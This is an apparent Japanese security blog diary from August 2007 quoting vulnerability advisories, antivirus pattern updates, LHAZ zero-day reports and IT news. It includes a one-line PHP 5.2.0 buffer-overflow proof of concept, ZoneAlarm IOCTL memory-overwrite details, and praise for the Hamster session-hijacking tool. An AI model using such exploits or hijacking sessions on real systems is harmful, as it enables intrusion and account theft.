ウイルスバスター2007の長大なパスの場合バッファオーバーフローする脆弱性の記事です。

9月上旬にはActiveUpdateされるそうです。

入手方法は、製品の最新版ダウンロードページからダウンロードできる。なお、アップデート機能による配信は、2007年9月上旬を予定している。


[]みんなアンチウイルスソフトには困っている

id:comikenさんうまい!座布団一枚!

確かに困っている人以外はブログには書かないですよね。

また困っている方がブログで紹介されやすいしね。

ノートン360でも買うかな。でも、ノートンも環境に依るのかもしれないけど、けなしている人多いですよね。会社PCノートンは全く問題なしだけど。

ま、困ってない人はブログとかに書かないですからねぇ。


[]Ajax普及でHTTP圧縮の利用率が上昇 − @IT:

HTTPの圧縮機能って、Webサーバー運用していたら帯域が腐るほどある以外は必須だと思っていたんですが・・・そうじゃなかったんですね。

回線が20%削減、、、これ確かに計算したら20%削減できていました。実質20%落ちていましたよ。

HTTP圧縮の利用率では、フォーチュン1000企業のうち275企業がWebサーバから送信するコンテンツの圧縮を行っていることが明らかになった。レポートでは圧縮で回線帯域の20%を削減でき、費用の節約額は、これらの企業だけで年間数百億円に上ると報告している。調査を開始した2年の2003年7 月時点では、HTTP圧縮を利用したWebサイトの比率は1.9%に過ぎず、急速に普及している様子がうかがえる。レポートでは、Web2.0Ajax で複雑化したコンテンツが増えたことから、HTTP圧縮の利用が進んだのではないかとしている。

IIS6.0増えているそうですwてか、今更Windows2000IIS入れないよね。Windows2003のを入れるから逆転するのは当たり前w

フォーチュン1000企業のWebサイトで利用されているWebサーバアプリケーションサーバのシェアについての最新の調査結果を発表した。調査によれば、過去1年でマイクロソフトIIS 6.0のシェアが9.5ポイント上昇して36.5%となり、IIS 5.0の18.10%を逆転。OSSWebサーバApacheの24.9%をしのぐ普及率となった。


[]Check Point Zone Labs VSDATANT Multiple IOCTL Privilege Escalation Vulnerabilities

ZoneAlarmのIOCTLに権限上昇することが可能な入力チェックの漏れ脆弱性が存在するそうです。

II. DESCRIPTION

Local exploitation of multiple input validation vulnerabilities within multiple Check Point Zone Alarm products could allow an attacker to execute arbitrary code in kernel (ring0) context.

The problems specifically exist within the IOCTL handling code in the vsdatant.sys device driver. The device driver fails to validate user-land supplied addresses passed to IOCTL 0x8400000F and IOCTL 0x84000013.

Since the Irp parameters are not correctly validated, an attacker could utilize these IOCTLs to overwrite arbitrary memory with the constant double-word value of 0x60001 or the contents of a buffer returned from ZwQuerySystemInformation. This includes kernel memory as well as the code segments of running processes.


[]Check Point Zone Labs Multiple Products Privilege Escalation Vulnerability

ZoneLabsの製品にローカル権限の上昇が可能な脆弱性が存在するそうです。ACLを回避できるみたいですね。

II. DESCRIPTION

Local exploitation of an insecure permission vulnerability in multiple Check Point Zone Labs products allows attackers to escalate privileges or disable protection.

The vulnerability specifically exists in the default file Access Control List (ACL) settings that are applied during installation. When an administrator installs any of the Zone Labs ZoneAlarm tools, the default ACL allows any user to modify the installed files. Some of the programs run as system services. This allows a user to simply replace an installed ZoneAlarm file with their own code that will later be executed with system-level privileges.


2007年08月20日(月曜日) 交通信号の日

ripjyr2007-08-20

[][]パターンアップ-4.661.00

Trendmicroのパターンがアップしました。

パターン番号:4.661.00

イエローアラート:なし
アップデート理由:TROJ_LZDROPPER.A緊急対応
新規対応
 緊急対応(Lhazの脆弱性対応)
  TROJ_LZDROPPER.A
亜種対応
 未調査


[]TROJ_LZDROPPER.Aの緊急対応としてパターン4.661.00が出ています。

Lhaz version 1.33の脆弱性をつく攻撃に対するウイルス名です。

It is the Trend Micro detection for a Trojan that reportedly takes advantage of a vulnerability in LHAZ version 1.33, a Japanese archiving application.

Once successfully exploited, it checks if the affected system is running a Japanese operating system.

ファイル名が日本語だそうです。

It also drops the following non-malicious files:

  • {Japanese characters}.ppt
  • {Japanese characters}.rtf


[]マイクロソフト、ITエンジニア向け支援活動を強化:

出張ワークショップやセミナーを拡大するそうです!!!

マイクロソフト株式会社は8月20日、ITエンジニア向け情報提供誌の創刊や、出張ワークショップやセミナー等の拡大実施など、ITエンジニア向けの支援活動「Power to the PRO」の強化策を発表した。

IT交差点らしいです。ITエンジニアへのフリーペーパーだそうです。

ITエンジニア向け情報提供誌「IT交差点」は、技術と人に焦点をあてて、ITエンジニアを多方面から支援するフリーマガジン。同社の営業担当による配布のほか、イベント会場での配布、パートナー経由で配布される。発行ペースは年4回。印刷物での提供のほか、同社サイトPDF版も公開する。


[]原水のコミュニティ通信 : TechEd 事前情報 その10: MVP バッヂのご紹介:

ずきん♪さん経由)

MVPバッチらしいです。これ見つけたら、声かけてみたらどうでしょう。

たぶん、気さくないいやつですよw


[]Life hacks〜仕事を楽しくするための習慣作り〜

また上野宣か!です。顔出しですw社長ですwなぜか幼く見えるのはなぜでしょう?w

Hackの説明からw。レベルに合わせて書ける上野さんを尊敬しますYO!

「ハック」と聞くと、侵入者という意味で使われる「ハッカー」に通じるネガティブな印象を持っているかもしれません。しかし、「ハック」はその人のアイデアや工夫などで、「楽をしようとしたら、すごく成果が出た!」とか、「思いつきの行動なのに、あっさりやってのけた!」という場面で使われます。「ハッカー」という言葉も元々そういう意味で使われていて、"コンピュータ魔法使いのように扱う人"に与えられた称号だったのです。


[][]ウイルスバスター2007 トレンド フレックス セキュリティ セキュリティパッチ公開のお知らせ

ウイルスバスター2007において、スパイウエアトラップエンジンでバッファオーバーフロー脆弱性が存在してパッチが公開されています

■修正内容

スパイウェアトラップエンジンによってバッファオーバフローが起きる問題を修正しました。

セキュメモで書かれていますが長大なパス名でバッファオーバーフローするそうです。

ウイルスバスター 2007 (通常版と月額版) に欠陥。スパイウェアトラップエンジンが長大なパス名によって buffer overflow する。影響は不明だが、修正内容は「セキュリティパッチ」であると明言されている。


[]「Opera 9.23」リリース、JavaScriptの脆弱性を修正:

Opera9.23において、Javascript経由で任意のコードを実行可能な脆弱性が存在するそうです

Opera 9.23では、悪意のあるJavaScriptにより任意のコードが実行される脆弱性を修正している。Operaによれば、この脆弱性は、Mozilla が提供するJavaScript用のツール「JavaScript Fuzzer」によって発見されたという。


[][]パターンアップ-4.659.00

Trendmicroのパターンがアップしました。

パターン番号:4.659.00

イエローアラート:なし
アップデート理由:定期アップデート(でも1415個の新種ウイルスに対応しています)
新規対応
 特筆なし
亜種対応
 MS06-040
  BKDR_VANBOT.AX


[]Microsoft,「Exchange」「Outlook」関連プロトコルをXandrosにライセンス供与:ITpro:

ScalixがExchangeとOutlook関連のプロトコルのライセンスを受けるそうです!これで完全に互換性ありですね!

Scalixは,「Microsoft Outlook Express」と似た使い勝手のAjax対応メール環境。オープンソースソフトウエア版と有償版が存在する。Xandrosは,開発元である米Scalixを買収してScalixを獲得した

この通信プロトコルのライセンス供与により,両社はMicrosoft電子メールプロトコルに対応したモバイル機器/パソコンメールソフトウエアScalixメールサーバーの間で,相互接続性を強化する。具体的には,Scalixメールサーバーが「Exchange ActiveSync protocol」および「Outlook Exchange Transport Protocol」に対応し,無線通信経由で「Microsoft Exchange Server」や各種メールクライアントメールメッセージ,カレンダー,アドレス帳,タスク・リストなどを同期できる。


[]ITmedia エンタープライズ:また日本のフリー圧縮ツールにゼロデイ攻撃

Lhazって使ったことないですが、ZIPファイルなのに.tgzファイル拡張子がついているみたいですね。

McAfeeによると、この攻撃には細工を施したZIPファイルが使われ、Lhazの脆弱性を悪用してトロイの木馬感染させる仕組みになっていた。脆弱性の詳細は不明だ。

Symantecによれば、問題は「.tgz」の拡張子が付いたファイルにある。感染するとバックドアが開かれることから、感染マシンを完全に制御する狙いがあることは明らかだとしている。なお、20日時点で修正プログラムなどは公開されていない。

まぁ、標的型攻撃はどんなツールでも使えるものは使え!って感じですね。

ソフトフリーオープンソース、商用を問わず、どんなOSでもどんな言語でも同様にセキュリティ攻撃の対象になることが、今回の攻撃で示されたとして警鐘を鳴らしている。


[]シトリックス、仮想化技術ベンダーXenSourceを5億ドルで買収へ - ZDNet Japan:

シトリックスがXenを5億ドルで買収だそうです。RedhatとかのXenベースの仮想環境とかどうなるんだろう・・・

Xen」と呼ばれる同社のオープンソース「ハイパーバイザー」ソフトウェアを利用すれば、1台のコンピュータで複数のOSを同時に動かせるようになる。これは、複数のサーバを効率性の高い1台のコンピュータで代用するのに便利だ。

Xenは最も普及しているRed HatNovellの2種類のLinuxサーバディストリビューションに同梱されているほか、Microsoft Windowsにも対応している。XenSourceの市販製品「XenEnterprise」は、このXenソフトウェアベースになっている。

デスクトップバーチャリゼーションで有効な資源を利用するようなソフトをだしてくるんだろうか・・・

今回の買収はCitrixにとって大きな方針転換で、同社では今後、企業のデータセンターサーバではなくデスクトップの集中管理に重点が置かれることになると、Bittman氏は語っている。


[]テレビ朝日・報道ステーションの誤報道について(いぶき文明公式ウェブサイト

メディアの劣化コピーキタ━━━━(゚∀゚)━━━━ !!!!! テラヒドス。

これはテレビ朝日の「意図的か、否かはともかく」、全くの誤報、映像引用のミスにより、私の真意と100パーセント逆の誤解を視聴者に与えたものです。8月3日の記者会見は、「全ての政治団体について一円からの領収証を添付するのは困る。それだけでは充分でない。政治団体も資金管理団体も認めず、政党のみで日常活動を行っている政治家の属する政党の扱いを公平にしないとバランスを欠く。政党間で協議し、公平なルールを確認してもらえば当然それに従う」と述べたものです。私が「困る」と言っているのは、「嫌だ」、「反対だ」といっているのではなく、「不充分・不公平で困る」と述べているのです。NHK等は正確に真意を報道しています。テレビ朝日は記者会見の全ビデオを持っているにもかかわらず、部内でチェックしていないのか、意図的なのか、「困る」の部分のみを放映し、キャスターもそれを前提に誠に失礼なコメントをしていました。


[]Storm Worm DNS and C&C Sigs; Updated Daily!)

Storm Wormが使うDNSをSnortで引っかけよう大作戦のSnortルールですがすごい量のDNSだw

As we all know Storm has created an ongoing serious issue. To that end we’ve got a list of name servers in use by the Storm nets, and will be publishing storm signatures based on them. Updated daily at the least, likely more often as our information sources improve.

関連URL


[]Xbox 360 100タイトル プレゼントキャンペーン(おぎわら@.NET道場 Blog(わんくま編))

Xbox 360 100タイトル プレゼントキャンペーンなんてやってるんですね。

MicrosoftさんもURL統一すればいいのに・・・なんでこんなにタケノコのように出てくるかな・・・


[]日本に戻って参りました:ITpro(Security from KAGURAZAKA)

鵜飼さんのこれまでの履歴とこれからについてかかれています。

先月、eEye Digital Securityを退職し、長かったカリフォルニアの生活を終えて日本に戻って参りました。そして、eEyeでセキュリティスキャナRetinaのエンジン開発の他、様々なリサーチを行っていた金居、eEyeの顧問を務めていた野澤とともに、神楽坂で新しい会社を設立致しました(http://www.fourteenforty.jp)。eEyeで培った経験を元に、セキュリティのコア技術にフォーカスした研究やコンサルティング、セキュリティプロダクトの開発などを行っていきたいと考えています。

Core技術・・・やっぱりがんばっていろいろ勉強しないと。

米国では、セキュリティのコア技術に関連する研究開発が日本に比べてやはり進んでいます。特に、解析技術や分析技術に関連する研究開発では、やや水をあけられているというのが現状です。0-dayやMalwareの脅威が急速に拡大する昨今、これらは非常に重要な技術になりつつありますので、まずはこの部分で日本からも研究成果を出し続けられるよう、論文や記事の執筆、講演など、色々な事に取り組みたいと思います。


[]New IOS Router security feature dynamically defends against day zero attacks - Calendar Of Updates:

Ciscoも12.4(15)T1からIPSを導入したそうです。パターンマッチ型らしいですね。

Automatic Signature Extraction (ASE) is a new feature in IOS release 12.4(15)T1 that is designed to find and stop worms and viruses on the network, day zero. To quote from one of the ASE developers Tin Yen, “the ASE feature is configured in the network to extract content specific signatures (often referred to as “patterns”) to help identify fast spreading worms and viruses by leveraging advanced deep packet inspection techniques”.


[]某所のWindows98SEをVistaに移行してきたw

買ったパソコンはこいつ。速度よりもデザインよりも値段w

まぁその日に持って帰れるものが必須だったりしたんですがwwww

12万強ですか。たしか15万とポイント20%だった気がする。

[rakuten:akindo:10007733:detail]

感想

モバイル AMD Sempron(TM) プロセッサ 3400+は遅いw(てかウイルスバスター2007のせいかもwww)


[]某所データセンターにてベンダーの技術者をいじめすぎた・・・

だって、本番環境のネットワークを許可なく勝手に抜くんだもん・・・・

そりゃ、停止連絡も全部すんでるけど、それはないだろ・・・って感じで。

めっちゃくちゃ怒りましたよ。上司にも即電話w


LuffyLuffy 2007/08/20 18:39 怒るのは当然ですなw 改善策も出してもらわないと。。

ripjyrripjyr 2007/08/20 20:09 とりあえず、それからビビって、作業一つ一つで伺いに来てうざかったです(何

2007年08月19日(日曜日) バイクの日

[]TIME HACKS!(@江青日記)

ほしいなぁ、買おうかなぁ・・・

若くて頭がいい人はいいなあ。超整理法の現代版。早速まねっこしてみようと思います

TIME HACKS!

TIME HACKS!


[]セキュリティとんこつ :夢見るころをすぎても:

ばりかた参加者キタ━━━━(゚∀゚)━━━━ !!!!!

だれが講師だったっけ・・・w

某社のHUBの電源周りがあまり強くないことをはじめて知った。それでも最近の製品は大分いいようだけど。職場で先日その会社のHUBの電源がこけたことを言ったら、さもありなんと言うような返事であった。


[]Targeted Zero-day Attack Against Free Tools - LHAZ(Computer Security Research - McAfee Avert Labs Blog:)

セキュメモ経由

LHAZ v1.33の脆弱性をつくZeroDay攻撃が出ているそうです。

Another exploit targeting a Japanese application is found today. This time, a free decompress tool, LHAZ v1.33, was used in a targeted attack. Maliciously crafted zip files could take advantage of an unidentified vulnerability in this tool and drops a BackDoor-CKB trojan.

Lhaz v1.33 の 0-day 欠陥を突く攻略 zip ファイルが登場。マカフィー製品では Exploit-LHAZ.a として検出する。


[]サイドジャッキングツール「Hamster」を試してみた:にわか鯖管の苦悩日記 _| ̄|●(2007-08-17):

Hamsterの検証ってことですが、これすげぇ。即ダウンロード

●Hamsterで何が出来るの?

 ・Wi-Fiホットスポット*2上で使用されているWebメール等の通信(cookie情報)をキャプチャして

  セッションをハイジャックすることが可能。

 ・MITM攻撃のように、クライアントサーバ間に介入することなくセッションを乗っ取ることが可能。

実際にGmailセッションをハイジャックできたそうです。すげっ・・・

●で、実際にセッションハイジャック出来たの?

 ・ものの見事にハイジャック可能でしたヽ(´ー`)ノ

   - 実際に試したのは gmailアクセス

   - あまりにも簡単に出来たのでkamezouさんとしばらく固まっていましたw

●で、結論は?

 ・当たり前の事ですが、ホットスポットでは、Webメール等の重要なデータへのアクセスはやめましょう。

   - SSL-VPN等でどこかにトンネルを張ってから使いましょう

 ・Hamsterでいたずらしないように・・・


[]http://www.milw0rm.com/exploits/4293:title=PHP <= 5.2.0 (php_win32sti) Local Buffer Overflow PoC (win32):]

PHP5.2.0のWindows版でローカルバッファオーバフローが発生する脆弱性のPoCが出ています。たった1行・・・

win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );

// ==================================================================================
//
//        php_win32sti.dll PHP <= 5.2.0 (win32) Buffer Overflow
//
//		[x] Discovery: boecke <boecke@herzeleid.net>
//		[x] Risk: Local Buffer Overflow (Medium - High Risk)
//		[x] Notes: EDX and EIP are able to be controlled and therefore
//			     have the potential to dictate program flow.
//
//		[x] "Sangre, sonando, de rabia naci.. Who do you trust?"
//
// ==================================================================================


[]携帯からテープ、HDDまで壊します――何でも粉砕機登場 − @IT:

結構バックアップテープとかの廃棄って時間も手間もかかるんですよね。こういうなんがあったらうれしい。

ナカバヤシは8月17日、1台でさまざまなメディアを粉砕する業務用のマルチメディア粉砕機「NCM-3700」を発売すると発表した。オープン価格。廃棄物処理会社や記録メディア製造メーカーを対象に販売する。

NCM-3700で粉砕できるのはDLTやLTOなどのテープメディア、2.5インチハードディスク携帯電話、プリント基板、クレジットカー ド、レントゲンフィルムなど。


[]BIND8はもう寿命、BIND9へのアップグレードを − @IT:

BIND8は終わりですか。BIND9は9.2位から使っててアップグレードは完了してるんですけど・・・

ISPとかのDNSは、、、、ry

「BIND8は寿命を迎えた」――最も広く利用されているDNS実装、BINDの開発者自身が、メーリングリストを通じてこのように呼び掛けている。

ISC(Internet Software Consortium)の創設者の一人で、長年に渡ってBINDの開発を手がけてきたポール・ヴィクシー氏は米国時間の8月9日、BINDメーリングリストに、BIND8/4からBIND9へのアップグレードを呼び掛ける投稿を行った。


[]御社のログ管理体制、見直してみませんか?− @IT:ISMSで考える運用管理のヒント(3))

ログとは何のためのログで、何を実証できるのか?が大切でログ取得計画なんてのも必要と思います。

何でもかんでもとるのは間違えですよね。多分、通信経路(FireWallやルータログ取得)クライアントログ取得、サーバSQLアクセス権)でログ取得なんてのが現実解かな。
もちろん専用のCat5や秘文なんかのわかりやすいログもよいですよね。

何にせよ、ログを取得するにはすべてのデバイスで時刻の同期が必要です。これ本当にしていないと苦労します・・・

ログ管理において、管理職などの権限のあるユーザーが承認した履歴があることで、従業員の操作が正しく行われたということが実証できます。しかし、上位の管理者の業務の実施状況については、本当にその管理者がその行為を実施したのかという証拠を示すことができません。

IDの共用は厳しいなぁ。まぁIPからある程度は特定できますが、共用している時点で本当にだれがやったかは確定できないですよね。

共用していなくてもID盗用ってのもありますけど

1人1人を識別するユーザーIDを付与していないと、ログを取得したとしても、有効に機能しない場合があるからです。例えば、部署で1つの共有IDを使用している場合、そのIDを使用している部署は絞り込めますが、その部署の誰が操作したのか、ログを分析しても判明することは難しいのです。

これいいなぁ。取得するログと意味がある程度あるので、上司に説明もしやすいし

米国商務省国立標準技術研究所(NIST)が2006年9月に発行した「SP800-92」が参考になります。

 この参考文献において、コンピュータセキュリティログは、基本としてどのようなアプリケーションから収集するのかというのが、以下のように明示されています。

* セキュリティソフトウェア

o アンチウイルス・アンチマルウェアソフトウェア

o IDS・IPSシステム

o リモートアクセスソフトウェア

o Webプロキシ

o 脆弱性管理ソフトウェア

o 認証サーバ

o ルータ

o ファイアウォール

o ネットワーク検閲サーバ

* オペレーティング・システム(OS

o システムイベント

o 監査ログ

* アプリケーション

o クライアントリクエストおよびサーバレスポンス

o アカウント情報

o 使用情報(使用時間、電子メールメッセージの大きさ、転送ファイルの大きさなど)

o 重要な運用上の操作(スタート、シャットダウン、アプリケーションの設定の変更など)

 そして、これらのログを管理するために「ログ管理基盤」を確立する必要があります。この「ログ管理基盤」は、以下の3つの段階から形成されています。

こういうのを作ると、本当に楽ですね。影響度なり重要度なんてほかの基準で定義されてますしね。

ログ取得のための設定については、サンプルとして、以下のように分類されています。

分類 影響度「低」のシステム影響度「中」のシステム影響度「高」のシステム
ログの保管期間 1〜2週間 1〜3カ月 3〜12カ月
ログのローテーション 任意(もし実施するのであれば、毎週、あるいは25Mbytesごと)6〜24時間ごと、あるいは、2〜5Mbytesごと 15〜60分ごと、あるいは、0.5〜1Mbytesごと
ログ転送する頻度 3〜24時間ごと 15〜60分ごと 少なくとも、5分ごと
ログ分析の頻度 1〜7日ごと 12〜24時間ごと 少なくとも、1日に6回
ログファイルのインテグリティチェック 任意 実施する 実施する
ログの暗号化 任意 任意 実施する
ログ転送時の暗号化 任意 実現可能な場合、実施する 実施する


[]FrSIRT - Symantec Enterprise Firewall Remote User Enumeration Security Weakness / Exploit

SymantecのEnterprise Firewall(パーソナルFireWallの企業向け完全制御可能型版)に脆弱性が存在してセンシティブな情報が見えてしまうそうです。

Une vulnerabilite a ete identifiee dans Symantec Enterprise Firewall, elle pourrait etre exploitee par des attaquants distants afin d'obtenir des informations sensibles. Ce probleme resulte d'une erreur de conception presente au niveau de la procedure d'authentification qui renvoie des reponses differentes en fonction de la validite de l'identifiant soumis, ce qui pourrait etre exploite par des attaquants afin de determiner l'existence et la validite d'un nom d'utilisateur.


[]てっしーの丸出し - 「早起き生活」始めました

早起き生活仲間みっけ!

ぁーーー、メール通知OFFにしてたw

目標が設定でき、そこからの乖離が一目できたり、週に1度まとめメールが送られてくる。


[]今日の感想「特になし!」 | 最近ウィルスバスターの調子がおかしい

これのことかな?

インターネットにつながらないってことは、tmproxyの問題でしょうねぇ。とりあえず最新版をダウンロードして適用かな。(バージョン1530のパッチ1239)

ウィルスバスター2007をパソコンに入れているのですが、最近調子が悪いです。

モジュールに重大なエラーが発生しました。ウィルスバスターの再インストールをしてください」というような警告が連発(この警告後インター